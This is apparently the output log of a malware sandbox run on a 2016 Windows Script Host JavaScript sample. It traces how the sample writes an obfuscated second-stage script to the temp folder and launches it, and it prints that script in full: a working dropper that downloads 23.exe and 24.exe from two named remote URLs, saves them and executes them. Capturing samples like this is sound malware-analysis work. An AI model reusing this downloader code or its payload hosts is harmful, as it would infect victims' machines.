802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.out
13 Oct 23:47:06 - mailware-jail, a malware sandbox ver. 0.8
13 Oct 23:47:06 - ------------------------
13 Oct 23:47:06 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js
13 Oct 23:47:06 - Malware files: malware/20161013/802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.js
13 Oct 23:47:06 - Output file for sandbox dump: sandbox_dump_after.json
13 Oct 23:47:06 - Output directory for generated files: output/
13 Oct 23:47:06 - ==> Preparing Sandbox environment.
13 Oct 23:47:06 - => Executing: env/utils.js
13 Oct 23:47:06 - => Executing: env/eval.js
13 Oct 23:47:06 - Preparing sandbox to intercept eval() calls.
13 Oct 23:47:06 - => Executing: env/function.js
13 Oct 23:47:06 - Preparing sandbox to intercept 'new Function()' calls.
13 Oct 23:47:06 - => Executing: env/wscript.js
13 Oct 23:47:06 - Preparing sandbox to emulate WScript environment.
13 Oct 23:47:06 - => Executing: env/browser.js
13 Oct 23:47:06 - Preparing sandbox to emulate Browser environment (default = IE11).
13 Oct 23:47:06 - Created: window[1]
13 Oct 23:47:06 - Created: document[2]
13 Oct 23:47:06 - document[2].createElement(html)
13 Oct 23:47:06 - Element[3] created, named: 'html'
13 Oct 23:47:06 - document[2].createElement(body)
13 Oct 23:47:06 - Element[5] created, named: 'body'
13 Oct 23:47:06 - document[2].body = 'Element[5]'
13 Oct 23:47:06 - document[2].createElement(head)
13 Oct 23:47:06 - Element[7] created, named: 'head'
13 Oct 23:47:06 - Element[3].appendChild(Element[7])
13 Oct 23:47:06 - Element[3].firstChild set
13 Oct 23:47:06 - document[2].body.get() => Element[5]
13 Oct 23:47:06 - Element[3].appendChild(Element[5])
13 Oct 23:47:06 - => Executing: env/agents.js
13 Oct 23:47:06 - Setting Browser environment to: IE8 on Win10 64bit
13 Oct 23:47:06 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated)
13 Oct 23:47:06 - => Executing: env/other.js
13 Oct 23:47:06 - => Executing: env/console.js
13 Oct 23:47:06 - ==> Executing malware file(s).
13 Oct 23:47:06 - => Executing: malware/20161013/802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.js
13 Oct 23:47:06 - WScript.Sleep(500)
13 Oct 23:47:06 - WScript.Sleep(500)
13 Oct 23:47:07 - WScript.Sleep(500)
13 Oct 23:47:07 - WScript.Sleep(500)
13 Oct 23:47:08 - WScript.Sleep(500)
13 Oct 23:47:08 - WScript.Sleep(500)
13 Oct 23:47:09 - WScript.Sleep(500)
13 Oct 23:47:09 - WScript.Sleep(500)
13 Oct 23:47:10 - WScript.Sleep(500)
13 Oct 23:47:10 - WScript.Sleep(500)
13 Oct 23:47:11 - WScript.Sleep(500)
13 Oct 23:47:11 - WScript.Sleep(500)
13 Oct 23:47:12 - WScript.Sleep(500)
13 Oct 23:47:12 - WScript.Sleep(500)
13 Oct 23:47:13 - WScript.CreateObject(WScript.Shell)
13 Oct 23:47:13 - Created: WScript.Shell[9]
13 Oct 23:47:13 - ActiveXObject(Scripting.FileSystemObject)
13 Oct 23:47:13 - Scripting.FileSystemObject[10] created.
13 Oct 23:47:13 - WScript.Shell[9].ExpandEnvironmentStrings(%TMP%)
13 Oct 23:47:13 - Scripting.FileSystemObject[10].OpenTextFile(%TMP%\XipXkrLd.js)
13 Oct 23:47:13 - TextStream[11] created.
13 Oct 23:47:13 - TextStream[11].Write("Thu Oct 13 2016 23:47:13 GMT+0200 (CEST)"
var SvjUKAc = new Date();
while(true) {
var XwHvxGz = new Date();
var ERupxfq = new Date(XwHvxGz.getTime() - SvjUKAc.getTime());
if(ERupxfq.getSeconds() > 5) {
break;
}
WScript.Sleep(500);
}
function ckCgnMtxxk(ibZdbdKp,CnWtQRBnxBRw) {nhjyEhX=0x1;ScLQeYp=0x0;ibZdbdKp.Run(CnWtQRBnxBRw, nhjyEhX, ScLQeYp);}
/*ToakIoXNFCHbmPvwLmfYFFdfZfhOyyKAhVBlGhbuYuaaPtQBjpqWMUQICukLkzPCPvwfXTyVLfMTKQFAbmUNmdXfyCGAptnxROKUHzooRKSGZhNsmcSyggxwOEwkOhfmmbrBLYyCrirmIspeQMjducrGyzFNHOrVaiscirbJkAkLKwkJOpUBbREKBnhjTpWxiiNxZDYJxM*/URjKuPKyMgrYr();
var mmcXR = ["http://lcbschool2.ac.th/pic/_notes/logs.php"];
var Wyiwp = ["http://masseriacarparelli.it/logs2.php"];
OsLAgfHCfdr(mmcXR, '23.exe');
OsLAgfHCfdr(Wyiwp, '24.exe');
function OsLAgfHCfdr(AUePbmz,xjshqCWtQ) {
var RIHh=407-407;
while(true) {
if(AUePbmz.length<=366-366) break;
var EOIT = xEnVXGW() % AUePbmz.length;
var KyRewCCEJ=AUePbmz[EOIT];
var BIxHp=xEnVXGW();
var TlJTxfwLxp=xjshqCWtQ;
var WDlUJfS=xjshqCWtQ;
var cvSRFkdY=112-111;
var LRACVIJdS = function(){
return new ActiveXObject(WDBmH('WS&WmSxvYpcV&cript&WmSxvYpcV&.She&l&l',[0,2,4,5,6],'&'));
}();
var WDlUJfS = ldNrVl(LRACVIJdS) + String.fromCharCode(92) + WDlUJfS;
var TbZdG = function(){
return new ActiveXObject(WDBmH('MSX&DiODGVvSB&ML2.XM&nmWtwgNOhvP&LHTTP',[0,2,4],'&'));
}();
UYCO(KyRewCCEJ,TbZdG);
if (TbZdG.status == 100+100) {
var sWPmhUM = function() {
return new ActiveXObject(WDBmH('ADO&DB&PGXbbEcUF&.&nEvdrVaCd&Stream',[0,1,3,5],'&'));
}();
var pDdQcrVkhARc=qSeGr(sWPmhUM,TbZdG.ResponseBody,WDlUJfS);
}
try {
ckCgnMtxxk(LRACVIJdS,WDlUJfS);
var xtIxXmh = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \''+TlJTxfwLxp+'\'');
if ( xtIxXmh.Count >= 1 ){break;}
} catch(e) {}
RIHh++;
MBGwN.splice (EOIT,327-326);
}
}
function ldNrVl(ByNmjV){var cxeVjMWm=["ExpandEnvironmentStrings"];return ByNmjV[cxeVjMWm[0]]('%TMP%')}
function qSeGr(fVDGQccj,Cmwwv,JCtZgNyuNT){try{fVDGQccj.open();mEvJHgAm(fVDGQccj);ShSvKwv(fVDGQccj,Cmwwv);EXncmYqiN(fVDGQccj);SAxs(fVDGQccj,JCtZgNyuNT);KlpoACZP=fVDGQccj.size;wcAPLEY(fVDGQccj);return KlpoACZP;}catch(e){}}
function UYCO(pEjdKZ,EZDobvT){try{bkIe = 'G*tqEiSfCEFO*E*T*sqkdtRMjxeQR'.split('*');EZDobvT.open(bkIe[0]+bkIe[2]+bkIe[3], pEjdKZ, false);EZDobvT.setRequestHeader("User-Agent", "Python-urllib/3.1");EZDobvT.send();}catch(e){}}
function WDBmH(mxhXCKNI,zTOiBb,woGPxsmnc){nymYF=mxhXCKNI.split(woGPxsmnc);VvdgKnq = 'isR';for(ltaWmxhr=0;ltaWmxhr<zTOiBb.length;ltaWmxhr++) {VvdgKnq+=nymYF[zTOiBb[ltaWmxhr]];}return VvdgKnq.substring(3,VvdgKnq.length);}
function URjKuPKyMgrYr() {/*BCKSGFxZTW().Sleep(5311-410);*/}
function YEPOLKB(){var NIZqdP=["random"];return Math[NIZqdP[0]]()}
function iPtA(EVWlhq) {EVWlhq.open();}
function mEvJHgAm(XPaMCcbtn) {XPaMCcbtn.type=1;}
function ShSvKwv(UBBO,aRAhF) {UBBO.write(aRAhF);}
function BCKSGFxZTW() {return/*XQRmBOFMbTPjQDAMKQpicfpILteYagMoPpTqwtDpMrwYdHDBnmBJHHxIfOUkXgZzcIpnLSVMQJxHJEZjjChdGcYCTcfpoaFEIVeetkGco*/WScript;}
function EXncmYqiN(hbpFEH) {var pOTTAMeVOw=[];hbpFEH.position=pOTTAMeVOw.length*(4714679-679);}
function SAxs(nTrxTKR,kQmMEIk) {nTrxTKR.saveToFile(kQmMEIk, 2);}
function wcAPLEY(NZHgp) {NZHgp.close();}
function xEnVXGW() {var AzTJ=99999+1;var vaVlYa = 100;return Math.round(YEPOLKB()*(AzTJ-vaVlYa)+vaVlYa);}
function QOawkeUO(iqwZo) {var maBHbxuS='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';for(var xfbbJ=0;xfbbJ<iqwZo;xfbbJ++){QvLxV+=maBHbxuS.charAt(Math.floor(Math.random()*maBHbxuS.length));}return QvLxV;}
function xfgtzigMYScAlH(XVdzyJUSJbBLjI) {return new ActiveXObject(XVdzyJUSJbBLjI);}
)
13 Oct 23:47:13 - TextStream[11].Close()
13 Oct 23:47:13 - WScript.Shell[9].ExpandEnvironmentStrings(%TMP%)
13 Oct 23:47:13 - WScript.Shell[9].Run(%TMP%\XipXkrLd.js, 1, 0)
13 Oct 23:47:13 - ==> Cleaning up sandbox.
13 Oct 23:47:13 - ==> Script execution finished, dumping sandbox environment to a file.
13 Oct 23:47:13 - Saving: output/_TMP__XipXkrLd.js
13 Oct 23:47:13 - Generated file saved
13 Oct 23:47:13 - The sandbox context has been saved to: sandbox_dump_after.json